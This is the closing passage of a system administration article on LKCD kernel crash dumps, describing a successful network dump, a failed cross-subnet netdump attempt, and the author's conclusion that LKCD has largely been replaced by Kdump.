Watch the console. The system should reboot after a while, indicating a successful recovery from the panic. Furthermore, you need to check the dump directory on the netdump server for the newly created core, indicating a successful network dump. Indeed, checking the destination directory, we can see the memory core was successfully saved. And now we can proceed to analyze it.

Worked

Example of unsuccessful netdump to different network segment

As mentioned before, the netdump functionality seems limited to the same subnet. Trying to send the dump to a machine on a different subnet results in an error (see screenshot below). I have tested this functionality for several different subnets, without success. If anyone has a solution, please email it to me.

Here’s a screenshot:

Failure

Conclusion

LKCD is a very useful application, although it has its limitations.

On one hand, it provides the critical ability to perform in-depth post-mortem forensics on crashed systems. The netdump functionality is particularly useful in allowing system administrators to save memory images after kernel crashes without relying on the internal hard disk space or the hard disk configuration. This can be particularly useful for machines with very large amounts of RAM, where dumping the entire contents of the memory to local partitions might be problematic. Furthermore, the netdump functionality allows LKCD to be used on hosts configured with RAID, overcoming the fact that LKCD is unable to work with md partitions.

However, the limitation to use within the same network segment severely limits the ability to mass-deploy netdump in large environments. It would be extremely useful if a workaround or patch were available so that centralized netdump servers could be used without relying on specific network topology.

Lastly, LKCD is a somewhat old utility and might not work well with modern kernels. In general, it is fairly safe to say it has been replaced by the more flexible Kdump, which we will review in the next article.